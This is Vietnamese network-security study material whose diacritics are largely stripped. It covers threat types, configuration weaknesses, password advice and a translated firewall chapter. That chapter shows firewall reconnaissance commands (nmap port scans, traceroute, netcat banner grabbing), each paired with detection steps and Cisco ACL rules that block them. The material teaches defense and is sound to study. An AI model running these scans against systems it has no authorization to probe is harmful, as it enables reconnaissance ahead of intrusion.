lo hong bao mat va hinh thuc tan cong

I

Nhng im yu trong bo mt v cc hnh thc

tn cng mng

I. Nhng mi e do i vi vn bo mt: C bn c 4 mi e do n vn bo mt mng nh sau:

1) Unstructured threats: Nhng mi e do thuc dng ny c to ra bi nhng hacker khng lnh ngh, h tht s khng c kinh nghim. Nhng ngi ny ham hiu bit v mun download d liu t mng Internet v. H tht s b thc y khi nhn thy nhng g m h c th to ra.

2) Structured threats: Hacker to ra dng ny tinh t hn dang unstructured rt nhiu. H c k thut v s hiu bit v cu trc h thng mng. H thnh tho trong vic lm th no khai thc nhng im yu trong mng. H to ra mt h thng c cu trc v phng thc xm nhp su vo trong h thng mng. C hai dng structured v unstructured u thng qua Internet thc hin tn cng mng.

3) External threats: Xut pht t Internet, nhng ngi ny tm thy l hng trong h thng mng t bn ngoi. Khi cc cng ty bt u qung b s c mt ca h trn Internet th cng l lc cc hacker r sot tm kim im yu, nh cp d liu v ph hu h thng mng.

4) Internal threats: Mi e do ny tht s rt nguy him bi v n xut pht t ngay trong chnh ni b, in hnh l nhn vin hoc bn thn nhng ngi qun tr. H c th thc hin vic tn cng mt cch nhanh, gn v d dng vi h am hiu cu trc cng nh bit r im yu ca h thng mng.

II. Nhng im yu trong vn bo mt: Hiu c nhng im yu trong bo mt l mt vn ht sc quan trng tin hnh nhng chnh sch bo mt c hiu qu. Hiu nhng im yu ny gip bo mt mng trc khi bi hacker tn cng. Cisco xc nh nhng im yu trong bo mt gm c: technology weaknesses, configuration weaknesses v policy weaknesses.

1) Technology weaknesses: im yu trong k thut gm c im yu trong protocol, operating system va hardware.

a) TCP/IP weaknesses: Giao thc TCP/IP l im yu trong bo mt v n c thit k nh mt tiu chun m giup cho vic trao i thng tin c d dng. iu lm cho n tr nn s dung rng rai nhng cung lm cho n d dng b tn cng v hu ht mi ngi u thn thuc vi cch thc TCP/IP lm vic. Hai giao thc m Cisco thch la chn trong chm giao thc TCP/IP nhng vn c hu li khng c bo mt la SMTP ( TCP ) va SNMP ( UDP ). in hnh ca k thut tn cng vo hai giao thc ny l IP spoofing, man-in-the-middle v session replay.

b) Operating System weaknesses: Trong khi tt c cc h iu hnh u c im yu th Linux v Unix c xem nh l t c im yu hn Windows. Thc t, hu ht mi ngi dng cc phin bn ca Windows.

c) Network equipment weaknesses: Hu ht cc thit b mng nh l servers, switchs, routers u c iu yu trong bo mt. Nhng co mt chnh sch tt cho vic cu hnh v lp t cho cc thit b mng s lm gim i rt nhiu s nh hnng ca im yu ny.

2) Configuration weaknesses: y l li do nh qun tr to ra. Li ny do cc thiu st trong vic cu hnh nh l: khng bo mt ti khon khch hng, h thng ti khon vi password d dng on bit, khng bo mt cc cu hnh mc nh trn thit b hay li trong vic cu hnh thit b.

a) Unsecured user account: Mi user account cn c usename v password cho mc ch bo mt.Cc username v password ny thng c truyn i dng clear text trn mng. Do , cn c chnh sch bo mt user account nh m ho, authentication

b) System account with easily guessed password: Mt im yu trong li cu hnh khc l bo mt account vi password d dng b nh cp. ngn chn tnh trng , ngi qun tr cn c chnh sch khng cho php mt password co hiu lc mai mai m password ny phi c mt thi hn kt thc.

c) Misconfigured Internet services: Mt vi cng ty s dng a ch tht trn mng internet nh a ch cho hosts v servers. iu ny to nn im yu m cc hacker s d dng khai thc thng tin. S dng giao thc NAT hoc PAT c th gii quyt vn trn. S dng a ch ring ( private address ) cho php nh a ch hosts v servers ma khng cn dng a ch tht trn mng, trong khi a ch tht th c border router nh tuyn ra mng internet. khng phi l bin php ti u. Port trn interface kt ni ra internet phi trng thi open cho php users vo mng internet v ngc li. l l hng trn bc tng la ( firewall ) m hacker c th tn cng vo. Bn c th to ra tnh bo mt cho network bng cch s dng conduits , l kt ni bo mt c bn. Cisco Secure Private Internet Echange ( PIX ) firewall l bin php ti u to ra tnh bo mt tt cho mng.

d) Unsecured default settings in product: Nhiu sn phm phn cng c cung cp m khng c password hoc l password sn c gip cho nh qun tr d dng cu hnh thit b. N lm cho cng vic d dng hn, nh mt s thit b ch cn cm vo v hot ng. iu ny s gip cho s tn cng mng tr nn d dng. Do , ta cn phi thit lp mt chnh sch cu hnh bo mt trn mi thit b trc khi thit b c lp t vo h thng mng.

e) Misconfigured Netword Equipment: Li cu hnh thit b l mt l hng c th khai thc tn cng mng: password yu, khng c chnh sch bo mt hoc khng bo mt user account u l li cu hnh thit b. Phn cng v nhng giao thc chy trn thit b cng to ra l hng bo mt trong mng. Nu bn khng c chnh sch bo mt cho phn cng v nhng giao thc ny th hacker s li dng tn cng mng. Nu bn s dng SNMP c mc nh thit lp th thng tin c th b nh cp mt cch d dng v nhanh chng. Do , hy chc chn l bn lm mt hiu lc ca SNMP hoc l thay i mc nh thit lp SNMP c sn.

3) Policy weaknesses: Chnh sch bo mt din t lm th no v u chnh sch bo mt c thc hin. y l iu kin quan trng gip vic bo mt c hiu qu tt nht. im yu trong chnh sch bao gm: Absence of a written security policy, organization politics, lack of business continuity, lax security administrator, installation and changes that do not follow the stated policy v no disaster recovery plan.

III. Types of network attacks: Cc hnh thc tn cng mng c th phn thnh 4 dng nh sau:

1) Reconnaissance attacks: Bc u hacker ping n tm nhm xc nh a ch IP ch. Sau , hacker xc nh nhng port cng nh nhng dch v ang sng trn a ch IP . T nhng thng tin ny, hacker bt u xc nh c dng v phin bn ca h iu hnh. Hacker tin hnh nh cp d liu hoc ph hu h iu hnh ca mng. Cc hnh thc tn cng dng ny bao gm: packet sniffers, port scans, ping sweeps, internet information queries.

a) Packet sniffers: L phn mm ng dng dng mt card adapter vi promiseous mode bt gi tt c cc gi tin gi xuyn qua mt mng LAN. K thut ny ch thc hin c trn cng mt collision domain. Packet sniffers s khai thc nhng thng tin c truyn dng clear text. Nhng giao thc truyn dng clear text bao gm: Telnet, FTP, SNMP, POP, HTTP Mt vd nh sau:

Code:TCP - Transport Control Protocol

Source Port: 3207

Destination Port: 110 pop3

Sequence Number: 1904801188

Ack Number: 1883396256

Offset: 5 (20 bytes)

Reserved: %000000

Flags: %011000

0. .... (No Urgent pointer)

.1 .... Ack

.. 1... Push

.. .0.. (No Reset)

.. ..0. (No SYN)

.. ...0 (No FIN)

Window: 64161

Checksum: 0x078F

Urgent Pointer: 0

No TCP Options

POP - Post Office Protocol

Line 1: PASS secretpass

Ta nhn thy password c truyn i dng clear text l secrectpass. Bi v packet c truyn i khng c m ho nh trn, n c th b x l bi bt k ai s dng k thut packet sniffers. Nhng cng c sau c dng ngn cn packet sniffers gm: authentication, switched infrastrutured, antisniffer va cryptography.

Authentication: K thut xc thc ny c thc hin ph bin nh one-type password (OTPs). K thut ny c thc hin bao gm hai yu t: personal identification number ( PIN ) v token card xc thc mt thit b hoc mt phn mm ng dng. Token card l thit b phn cng hoc phn mm sn sinh ra thng tin mt cch ngu nhin ( password ) tai mt thi im, thng l 60 giy. Khch hng s kt ni password vi mt PIN to ra mt password duy nht. Gi s mt hacker hc c password bng k thut packet sniffers, thng tin cng khng c gi tr v n ht hn.

Switched infrastructured: K thut ny c th dng ngn chn packet sniffers trong mi trng mng. Vd: nu ton b h thng s dng switch ethernet, hacker ch c th xm nhp vo lung traffic ang lu thng ti 1 host m hacker kt ni n. K thut ny khng lm ngn chn hon ton packet sniffer nhng n c th gim c tm nh hng ca n.

Antisniffer tools: L nhng phn mm v phn cng c thit k ngn chn sniffer. Tht s nhng ng dng ny khng ngn chn c hon ton nguy c b sniffer nhng cng ging nh nhng cng c khc, n l mt phn ca ton b h thng. Cryptography: K thut m ho ny gip cho d liu c truyn i qua mng ma khng dng clear text. Gi s hacker co bt c d liu th cng khng th gii m c thng tin. Phng php ny c hiu lc hn so vi vc d tm v ngn cn sniffer. Nu nh mt knh truyn c m ho, d liu m packet sniffer d tm c cng khng c gi tr v khng phi l thng tin chnh xc ban u. H thng m ha ca Cisco da trn k thut IPSec, giao thc m ha ng hm da trn a ch IP. Nhng giao thc gm: Secure Sell Protocol ( SSH ) v Secure Socket Layer ( SSL ).

b) Port scans va ping sweeps: K thut ny c tin hnh nhm nhng mc ch nh sau: Xc nh nhng dch v trong mng Xc nh cc host v thit b ang vn hnh trong mng Xc nh h iu hnh trong h thng Xc nh tt c cc im yu trong mng, t tin hnh nhng mc ch khc. Vi k thut ping sweeps, hacker c th xc nh mt danh sch cc host ang sng trong mt mi trng. T , hacker s dng cng c port scans xoay vng qua tt c cc port v cung cp mt danh sch y cc dch v ang chy trn host tm thy bi ping sweeps. Cng vic tip theo l hacker xc nh nhng dch v c im yu v bt u tn cng vo im yu ny. K thut IDS c dng cnh bo cho nh qun tr khi c reconnaissance attacks nh l port scans va ping sweeps. IDS gip nh qun tr c s chun b tt nhm ngn cn hacker.

c) Internet information queries: DNS queries c th ch ra nhiu thng tin nh l ngi s hu mt domain no v range a ch no c n nh cho domain . Hacker s dng cng c ny trinh st tm ra cc thng tin trn mng. Cng vi port scans v ping sweeps, sau khi tm ra c nhng thng tin y nh cc port active, cc giao thc chy trn port , hacker tin hnh kim tra nhng c trng ca cc ng dng ny tm ra im yu v bt u tn cng.

2) Access attacks: Trong phng php ny, k xm nhp in hnh tn cng vo mng nhm: nh cp d liu, ginh ly quyn access, v ginh ly nhng c quyn access sau ny. Access attacks c th bao gm: Password attack Trust exploitation Port redirection Man in the middle attack

a) Password attack: Hacker c th xm nhp h thng dng cc k thut brute-force attacks, trojan horce, IP spoofing va packet sniffer. Thng mt cuc tn cng brute-force attack c thc hin dng 1 chu trnh chy xuyn qua mng v c gng xen vo chia s mi trng. Khi hacker ginh c quyn access n mt ngun ti nguyn, hacker cng vi user cng chia s quyn li. Nu nh c ti nguyn th hacker s to ra mt ca s kn cho ln access sau. Hacker c th lm thay i bng nh tuyn trong mng. iu s lm chc chn rng tt c cc gi tin s c gi n hacker trc khi c gi n ch cui cng. Trong mt vi trng hp, hacker c th gim st tt c cc traffic, tht s tr thnh mt man in the middle. Ta c th hn ch password attack bng nhng cch sau: Khng cho php user dng cng password trn cc h thng. Lm mt hiu lc account sau mt vi ln login khng thnh cng. Bc kim tra ny gip ngn chn vic r sot password nhiu ln. Khng dng passwords dng clear text: dng k thut OTP hoc m ho password nh trnh by phn trn. Dng strong passwords: Dng password ny dng t nht 8 k t, cha cc uppercase letters, lowercase letters, nhng con s v nhng k t c bit.

b) Trust exploitation: y l phng php khai thc tin cy , n da vo cc mi quan h tin cy bn trong mng. Bnh thng, nu hai domain c mi quan h tin cy vi nhau th cho php thit b domain ny c th access vo domain kia. Hacker s li dng s h trong mi quan h tin cy nhm khai thc cc sai st trong mi quan h ny tho hip, tc l kim sot. H thng bn ngoi firewall s c mi quan h hon ton khng tin cy vi h thng bn trong firewall.

c) Port redirection: L mt dng khc ca trust exploitation attack m n s dng mt host tho hip nhm ly giy php ra vo firewall. Ta c th tng nh l mt firewall vi 3 interface v mi interface kt ni vi 1 host. Host bn ngoi c th hng n host public services ( thng c gi l demilitanized zone- DMZ ). V host public services c th hng ti c host bn trong hay bn ngoi firewall.Hacker lm cho host public service tr thnh 1 host tho hip. Hacker t mt phn mm ti host ny nhm to ra mt traffic trc tip t host outside n host inside. Kt ni ny s ko thc hin thng qua firewall. Nh vy, host bn ngoi ginh c quyn kt ni vi host bn trong thng qua qui trnh port redirection ti host trung tm ( public services host ).

d) Man in the middle attack: K thut man in the middle c thc hn bao gm: Netword packet sniffers Giao thc routing v transport. Tn cng man in the middle nhm mc ch: nh cp d liu Ginh ly mt phin giao dch Phn tch traffic trong mng DoS Ph hng d liu c truyn Mt v d ca man in the middle attack l: mt ngi lm vic cho ISP v c gng access n tt c cc gi d liu vn chuyn gia ISP v bt k mt mng no khc. Ta c th ngn chn hnh thc tn cng ny bng k thut m ho: m ho traffic trong mt ng hm IPSec, hacker s ch nhn thy nhng thng tin khng c gi tr. (vnpro.org)

Phng thc bo v thng tin c nhn vi mt khu kin c

Password l cc m kha m bn s dng truy cp thng tin c nhn m bn lu trn my tnh v trong ti khon online ca bn.

Nu cc tn trm hay ngi dng nguy him khc ly trm thng tin ny, h c th s dng tn ca bn m ti khon credit card ca bn. V trong nhiu trng hp bn khng ch n nhng s tn cng ny cho ti khi n qu mun. Tuy nhin, vic to mt password tt v bo v chng l khng kh.

Lm g to mt password vng chc

Vi mt k tn cng, mt password mnh nn xut hin bng chui cc k t ngu nhin. Tiu chun di y c th gip password ca bn lm c nh vy:

To chiu di. Mi k t m bn thm vo password ca mnh tng s an ton, password ca bn nn c chiu di trn 8 k t, 14 k t hay hn na l l tng.

Nhiu h thng cng h tr vic s dng space bar trong passwords, v vy bn c th to mt nhm t c hnh thnh bng nhiu t (gi l mt pass phase). Mt pass phase ny thng d nh hn mt password n, min l chng di hn v kh on hn.

Kt hp cc k t, s, v cc symbol. S a dng ca cc k t m bn c trong password s lm cho n tr nn kh on hn. Cc c trng quan trng bao gm:

- Cc kiu k t v chiu di n nn c trong password. Mt chui 15 k t gm cc ch ci v s ngu nhin s to cho bn mt password vng hn khong 33.000 ln so vi password ch c 8 k t t bn phm. Nu bn khng th to password bao gm cc symbol th bn phi cho n di hn mt cch ng k c th c c mc bo v tng t. Mt password l tng l kt hp c hai chiu di v cc loi khc nhau ca symbol.

- S dng ton b keyboard, khng ch cc k t chung. Cc symbol c ly bng cch gi phm Shift ly cc k t trn ca mt phm l rt ph bin trong password.

S dng cc t v cc cm t d nh nhng kh on cho ngi khc. Cch tt nht nh mt khu ca bn v cc cm t l vit chng ra. Khng c g sai khi vit cc mt khu ca bn ra nhng chng cn phi c bo v m bo c an ton v hiu qu.

To mt password an ton v d nh theo 6 bc:

1. Ngh nhng cu m bn c th nh. V d: My son Aiden is three years old

2. Kim tra xem my tnh hay cc h thng online c h tr cc khong trng hay khng.

3. Nu my tnh hay cc h thng online khng h tr cc khong trng, th phi bin i n thnh mt mt khu bng cch ly cc ch u ca mi t trong cu. V d bng vic s dng v d trn th bn s t l msaityo.

4. Thm tnh phc tp bng cch trn cc ch hoa, ch thng v s.

5. Cui cng, thay mt vi k t c bit. Bn c th s dng cc symbol trng ging cc ch ci, cc t kt hp (thay th cc khong trng) v cc cch khc lm cho mt khu ca bn phc tp hn.

6. Kim tra mt khu ca bn vi Password Checker. Password Checker l mt trang web khng ghi li m ch gip bn xc nh s an ton mt khu ca bn.

Mt vi im m password phi trnh

C vi phng php c s dng to cc mt khu li rt d b on bi cc tn ti phm. trnh im yu ny, chng ta phi trnh nhng trng hp nh sau:

* Trnh cc chui hoc cc k t lp li: v d 123456, 2222 * Trnh s dng nhng thay th ging nhau gia ch v s: v d thay i -> 1 hay a -> @ * Trnh tn ng nhp ca bn * Trnh cc t trong t in theo bt k ngn ng no * S dng nhiu hn mt password mi ni * Trnh s dng lu tr online

Ty chn blank password

Mt blank password (khng c password) trn account ca bn l an ton hn so vi cc mt khu km nh 1234. Cc ti phm c th d dng on mt mt khu n gin, nhng trn cc my tnh s dng Window XP, mt ti khon khng c password khng th truy cp t xa bi mng ni b hay trn Internet (Cc ty chn ny khng c sn cho Microsoft Window 2000, Windows Me..). Bn c th chn s dng mt blank password trong account my tnh ca bn nu my tnh ca bn c nhng tiu chun sau:

* Bn ch c mt my tnh hay bn c vi my tnh nhng bn khng cn truy cp thng tin trn mt my tnh ny n my tnh khc. * My tnh phi bo m v mt vt l (bn phi tin tng mi ngi u c truy cp vt l n my tnh).

S dng mt blank password khng phi lun l mt tng tt. V d: mt my tnh xch tay m bn mang theo bn khng th an ton v mt vt l, v th bn nn cn c mt password tt.

Truy cp v thay i password nh th no

Cc account online

Cc trang web c cc iu khon khc nhau, cc iu khon ny chi phi cch m bn c th truy cp hay thay i password ca bn. Bn s phi tm mt link (nh l My account) trn trang ch ca trang link ti trang c bit dng qun l mt khu v accout ca mnh.

Cc password my tnh

Cc file tr gip cho h thng my tnh ca bn thng cung cp thng tin v vic to, thay i v truy cp cc user account c bo v mt khu. Bn c th th tm thng tin ny online ti cc trang ca cc hng sn xut phn mm. V d: nu bn s dng Window XP, phn h tr c th hin th cho bn thy c cng vic ny nh th no qun l password, thay i password.

Gi mt khu ca bn tht b mt

Hy gi tht cn thn cc mt khu ca bn v cc pass phrase.

* Khng tit l chng cho ngi khc. Gi cc mt khu ca bn n so vi cc bn ca bn v cc thnh vin trong gia nh (c bit l tr con). Cc mt khu m bn cn chia s vi cc ngi cn li, nh l mt khu account ngnh ngn hng ca bn m bn c th chia s v hay chng ca bn ch l cc ngoi l. * Bo v bt k mt khu no c ghi chp. Cn cn thn ni m bn giu mt khu m bn ghi hay vit ra. * Khng bao gi cung cp mt khu ca bn trn e-mail hay da vo mt yu cu e-mail. * Thay i password ca bn mt cch thng xuyn * Khng nh password ca bn trn my tnh m bn khng iu khin n.

Phi lm g khi password b nh cp.

Bo m kim tra tt c cc thng tin m bn bo v vi mt khu, nh l cc tuyn b ti chnh hng thng ca bn, cc bn bo co credit, cc ti khon shopping online... Cc mt khu tt, d nh c th gip bn chng li k gian tr v nhn dng nhng tn trm m khng c cc bo v. Nu mt ai t nhp vo h thng v ly mt cc thng tin ny ca bn th h s c c mt khu ca bn. Nu bn thy bt c mt hnh ng nghi ng l c ai truy cp thng tin ca bn hy thng bo cho cc chuyn gia bit ngay nu bn c th. Hy xem thm thng tin trn what to do nu bn ngh s nhn dng ca bn b nh cp hay bn c th ang ging nh b la. (Theo Microsoft)

Firewall - Attack and defense

Sut t khi Cheswick v Bellovin vit cun anh hng ca v cch xy dng cc bc tng la v theo di mt hacker qu quyt tn Berferd, tng thit t mt serverweb trn Internet m khng trin khai mt bc tng la c xem l t st. Cng bng nh t st nu quyt nh ph mc cc nhim v v bc tng la vo tay cc k s mng. Tuy gii ny c th tm hiu cc quan h mt thit v k thut ca mt bc tng la, song li khng ha chung nhp th vi h bo mt v tm hiu no trng cng nh cc k thut ca cc tay hacker qu quyt. Kt qu l, cc bc tng la c th b chc thng do cu hnh sai, cho php attacker nhy b vo mng v gy ra i ha.

I. Tng quan bc tng la

Hai kiu bc tng la ang thng lnh th trng hn nay: h gim qun ng dng (application proxies) v cng lc gi tin (packet filtering gateway). Tuy cc h gim qun ng dng c xem l an ninh hn cng lc gi tin, song bn cht hn hp v cc hn ch kh nng vn hnh ca chng gii hn chng vo lung lu thng i ra cng ty thay v lung lu thng i vo serverweb ca cng ty . mt khc, trong nhiu t chc ln c cc yu cu kh nng vn hnh cao. Nhiu ngi tin rng hin cha xut hin bc tng la hon ho , nhng tng lai y sn lng. Mt s hng kinh doanh nh Network Associates Inc. (NAI), AXENT, Internet Dynamics, v Microsoft pht trin cng ngh cung cp tnh nng bo mt y nhim vi kh nng vn hnh ca cng ngh lc gi tin (mt dng lai ghp gia hai cng ngh),song vn cha hon thin . Sut t khi bc tng la u tin c ci t, cc bc tng la bo v v s mng trnh c nhng cp mt t m v bn ph hoi nhng cn lu chng mi tr thnh phng thuc tr bch bnh bo mt. Cc ch yu bo mt u c pht hin hng nm vi hu nh mi kiu bc tng la trn th trng.T hi hn, hu ht cc bc tng la thng b cu hnh sai, khng bo tr, v khng gim st, ngng ca m toang.

Nu khng phm sai lm, mt bc tng la c thit k, cu hnh, v bo tr k lng hu nh khng th t nhp. Thc t, hu ht cc k tn cng c tay ngh cao u bit iu ny v s n gin trnh vng qua bc tng la bng cch khai thc cc mi quan h tin tng (trust relationships) v cc ch yu bo mt ni kt lng lo nht, hoc trnh n hon ton bng cch tn cng qua mt ti khon quay s.

im cn bn: hu ht attacker dn mi n lc vng qua mt bc tng la mnh - mc tiu y l to mt bc tng la mnh. Vi t cch l iu hnh vin bc tng la, ta bit r tm quan trng ca vic tm hiu k ch. Nm c cc bc u tin m mt attacker thc hin b qua cc bc tng la s gip bn rt nhiu trong vic pht hin v phn ng li mt cuc tn cng. Chng ny s hng dn bn qua cc k thut thng dng hin nay pht hin v im danh cc bc tng la, ng thi m t vi cch m attacker gng b qua chng. Vi tng k thut, ta s tm hiu cch pht hin v ngn chn cc cuc tn cng.

II. nh danh cc bc tng la

Hu ht mi bc tng la u mang mt "mi hng" in t duy nht. Ngha l, vi mt tin trnh qut cng, lp cu la, v nm gi biu ng n gin, bn tn c ng c th hiu qu xc nh kiu, phin bn, v cc quy tc ca hu ht mi bc tng la trn mng. Ti sao vic nh danh ny li quan trng? Bi v mt khi nh x c cc bc tng la, chng c th bt u tm hu cc im yu v gng khai thc chng.

1. Qut trc tip : K thut Noisy

Cch d nht tm kim cc bc tng la l qut cc cng ngm nh c th. Mt s bc tng la trn th trng s t nh danh duy nht bng cc t qut cng n gin bn ch cn bit ni dung tm kim. V d, Firewall-1 ca Check point lng ch trn cc cng TCP 256, 257, 258, v Proxy Server ca Microsoft thng lng ch trn cc cng TCP 1080 v 1745. Vi s hiu bit ny, qu trnh tm kim cc kiu bc tng la ny chng c g kh vi mt b qut cng nh nmap:

Code:# nmap -n -vv -P0 -p256,1080,1745 192.168.50.1 - 60.254

Dng kha chuyn -PO v hiu ha tnh nng ping ICMP trc khi qut. iu ny quan trng bi hu ht bc tng la khng p ng cc yu cu di ICMP. C attacker nht nht ln hung bo u tin hnh qut rng ri mng ca bn theo cch ny, tm kim cc bc tng la ny v tm kim mi khe h trong kt st vnh ai ca bn. Nhng attacker nguy him hn s lng sc vnh ai ca bn cng ln lt cng tt. C nhiu k thut m attacker c th s dng h sp radar ca bn, bao gm ngu nhin ha cc ping, cc cng ch, cc a ch ch, v cc cng ngun;dng cc server c mi; v thc hin cc t qut ngun c phn phi. Nu cho rng h thng pht hin xm nhp (IDS) ca bn nh RealSecure ca Internet Security Systems hoc SessionWall-3 ca Abirnet s pht hin attacker nguy him ny, bn nn suy ngh li. Hu ht cc IDS u ngm nh cu hnh ch nghe cc t qut cng ngu n v n o nht. Tr phi bn s dng IDS nhanh nhy v tinh chnh cc k danh pht hin, hu ht cc cuc tn cng s hon ton lm ng. Bn c th to mt t qut ngu nhin ha nh vy bng cch dng cc k m Perl cung cp trn chuyn khu web www.osborne.com/hacking .

Cc bin php phng chng

Bn cn phong ta cc kiu qut ny ti cc b nh tuyn bin hoc dng mt kiu cng c pht hin t nhp no min ph hoc thng mi. Mc d th, cc t qut cng n l s khng c thu nht theo ngm nh trong hu ht cc IDS do bn phi tinh chnh nhy cm ca n trc khi c th da vo tnh nng pht hin.

Pht Hin

chnh xc pht hin cc t qut cng bng tnh nng ngu nhin ha v cc server c mi, bn cn tinh chnh tng l danh pht hin qut cng. Tham kho ti liu hng dn s dng ca hng kinh doanh IDS bit thm chi tit. Nu mun dng RealSecure 3.0 pht hin tin trnh qut trn y, bn t phi nng cao nhy cm ca n theo cc t qut cng n l bng cch sa i cc tham s ca k danh qut cng. Bn nn thay i cc ni dung di y to nhy cm cho qut ny:

1. La v ty bin (Customize) Network Engine Policy. 2. Tm "Port Scan" v la ty chn Options. 3. Thay i ports thnh 5 cng. 4. Thay i Delta thnh 60 giy.

Nu ang dng Firewall-l vi UNIX, bn c th dng trnh tin ch ca Lance Spitzner pht hin cc t qut cng Firewall-1 www.enteract.com/~lspitz/intrusion.html. K m alert.sh ca ng s cu hnh Check point pht hin v gim st cc t qut cng v chy mt User Defined Alert khi c ng tc.

Phng Chng

ngn cn cc t qut cng bc tng la t Internet, bn cn phong ta cc cng ny trn cc b nh tuyn ng trc cc bc tng la. Nu cc thit b ny do ISP qun l, bn cn lin h vi h tin hnh phong ta. Nu t bn qun l chng, bn c th dng cc Cisco ACL d y phong ta r rt cc t qut nu trn y: Code: access - list 101 deny tcp any any eq 256 log ! Block Firewall-l scans

access - list 101 deny tcp any any eq 257 log ! Block Firewall-l scans

access - list 101 deny tcp any any eq 258 log ! Block Firewall-l scans

access - list 101 deny tcp any any eq 1080 log ! Block Socks scans

access - list 101 deny tcp any any eq 1745 log ! Block Winsock scans

Ghi ch : Nu phong ta cc cng ca Check Point (256-258) ti cc b dnh tuyn bin, bn s khng th qun la bc tng la t lnternet. Ngoi ra, tt c cc b nh tuyn phi c mt quy tc dn dp (nu khng khc t cc gi tn theo ngm nh), s c cng hiu ng nh khi ch nh cc tc v khc t:

access - list 101 deny ip any any log ! Deny and log any packet that got through our ACLs above

2. R Tuyn ng

Mt cch thinh lng v tinh t hn tm cc bc tng la trn mt mng l dng traceroute . Bn c th dng traceroute ca UNIX hoc tracert.exe ca NT tm tng chng dc trn trn ng truyn n ch v tin hnh suy din. Traceroute ca Linux c ty chn -I, thc hin r ng bng cch gi cc gi tin ICMP, tri vi k thut gi tin UDP ngm nh.

Code: $ traceroute - I www.yourcompany.com

traceroute to www.yourcompany.com ( 172.17.100.2 ) , 30 hops max, 140 byte packets

1 attack-gw ( 192.168.50.21) 5.801 ms 5.105 ms 5.445 ms

2 gw1.smallisp.net ( 192.168.51.l)

3 gw2.smallisp.net ( 192.168.52.2)

.....

13 hssi.bigisp.net ( 10.55.201.2 )

14 seriall.bigisp.net ( 10.55.202.l)

15 www.yourcompany.com ( 172.29.11.2)

C c may chng ng ngay trc ch ( 10.55.202.1) l bc tng la, nhng ta cha bit chc. Cn phi o su thm mt cht.

V d trn y l tuyt vi nu cc b nh tuyn gia bn v cc serverch p ng cc gi tin c TTL ht hn. Nhng mt s b nh tuyn v bc tng la c xc lp khng tr v cc gi tin ICMP c TTL ht hn (t cc gi tin ICMP ln UDP). Trong trng hp ny, s suy din t khoa hc hn. Tt c nhng g bn c th thc hin l chy traceroute v xem chng no p ng cui cng, v suy ra y l mt bc tng la hoc ch t l b nh tuyn u tin trong ng truyn bt u phong ta tnh nng tracerouting. V d, y ICMP ang b phong ta n ch ca n, v khng c p ng no t cc b nh tuyn vt qu client - gw.smallisp.net :

Code: 1 stoneface (192.168.10.33) 12.640 ms 8.367 ms

2 gw1.localisp.net (172.31.10.1) 214.582 ms 197.992 ms

3 gw2.localisp.net (172.31.10.2) 206.627 ms 38.931 ms

4 dsl.localisp.net (172.31.12.254) 47.167 ms 52.640 ms

........

14 ATM6.LAX2.BIGISP.NET (10.50.2.1) 250.030 ms 391.716 ms

15 ATM7.SDG.BIGISP.NET (10.50.2.5) 234.668 ms 384.525 ms

16 client-gw.smallisp.net (10.50.3.250) 244.065 ms ! X * *

17 * * *

18 * * *

Cc Bin Php Phng Chng

Vic chnh sa s r r thng tin traceroute l hn ch ti a cc bc tng la v b nh tuyn p ng cc gi tin c TTL ht hn. Tuy nhin, iu ny khng phi lc no cng n m di s kim sot ca bn v nhiu b nh tuyn c th n m di s iu khin ca ISP. Pht Hin pht hin cc traceroute chun trn bin, bn cn gim st cc gi tin UDP v ICMP c gi tr TTL l 1. thc hin iu ny vi RealSecure 3.0, bn bo m nh du TRACE_ROUTE decode name trong Security Events ca Network Engine Policy. Phng chng ngn cn cc traceroute chy trn bin, bn c th cu hnh cc b nh tuyn khng p ng cc thng ip TTL EXPI#800000 khi n nhn mt gi tin c TTL l 0 hoc 1. ACL di y s lm vic vi cc b nh tuyn Cisco: Code:access - list 101 deny ip any any 11 0 ! ttl-exceeded

Hoc theo l tng, bn nn phong ta ton b lung lu thng UDP khng cn thit ti cc b nh tuyn bin.

3. Nm Gi Biu Ng

K thut qut tm cc cng bc tng la l hu ch trong vic nh v cc bc tng la, nhng hu ht cc bc tng la khng lng ch trn cc cng ngm nh nh Check point v Microsoft, do vic pht hin phi c suy din. Nhiu bc tng la ph dng s cng b s hin din ca chng bng cch n gin ni vi chng. V d , nhiu bc tng la gim qun s cng b chc nng ca chng vi cch mt bc tng la, v mt s s qung co kiu v phin bn ca chng. V d, khi ta ni vi mt my c tin l mt bc tng la bng netcat trn cng 21 (FTP ), ta s thy mt s thng tin th v :

Code: C:\TEMP>nc -v -n 192.168.51.129 2 l

[UNKNOWN] [ 192.168.5l.129 ] 2 l ( ? ) open

220 Secure Gateway FTP server ready .

Biu ng "Secure Gateway server FTP ready" l mt du hiu l ty ca mt hp Eagle Raptor c. Vic ni thm vi cng 23 (telnet) s xc nhn tn bc tng la l "Eagle."

Code: C:\TEMP>nc -v -n 192.168.51.129 23

[UNKNOWN] [ 192.168.5l.129 ] 23 ( ? ) open

Eagle Secure Gateway . Hostname :

V cui cng. nu vn cha b thuyt phc server ca bn l mt bc tng la. bn c th netcat vi cng 25 ( SMTP ), v n s bo cho ban bit n l g:

Code: C:\TEMP>nc -v -n 192.168.51.129 25

[UNKNOWN] [ 192.168.5l.129 ] 25 ( ? ) open

421 fw3.acme.com Sorry, the firewall does not provide mail service to you.

Nh thy trong cc v d trn y, thng tin biu ng c th cung cp cc thng tin qu gi cho attacker trong khi nh danh cc bc tng la. Dng thng tin ny, chng c th khai thc cc ch yu ph bin hoc cc cu hnh sai chung.

Bin Php Phng Chng

chnh sa ch yu r r thng tin ny, bn gii hn thng tin biu ng qung co. Mt biuu ng tt c th km theo mt mc cnh gic mang tnh php l v tt c mi n lc giao kt s c ghi s. Cc chi tit thay i c th ca cc biu ng ngm nh s ty thuc nhiu vo bc tng la c th, do bn cn lin h hng kinh doanh bc tng la.

Phng Chng

ngn cn attacker ginh c qu nhiu thng tin v cc bc tng la t cc biu ng qung co, bn c th thay i cc tp tin cu hnh biu ng. Cc khuyn ngh c th thng ty thuc vo hng kinh doanh bc tng la. Trn cc bc tng la Eagle Raptor, bn c th thay i cc biu ng ftp v telnet bng cch sa i cc tp tin thng bo trong ngy: tp tin ftp.motd v telnet.motd.

4. K Thut Pht Hin Bc tng La Cao Cp

Nu tin trnh qut cng tm cc bc tng la trc tip, d theo ng truyn, v nm gi biu ng khng mang li hiu qu, attacker s p dng k thut im danh bc tng la theo cp k tip. C th suy din cc bc tng la v cc quy tc ACL ca chng bng cch d tm cc ch v lu cc l trnh phi theo (hoc khng theo) n .

Suy Din n Gin vi nmap

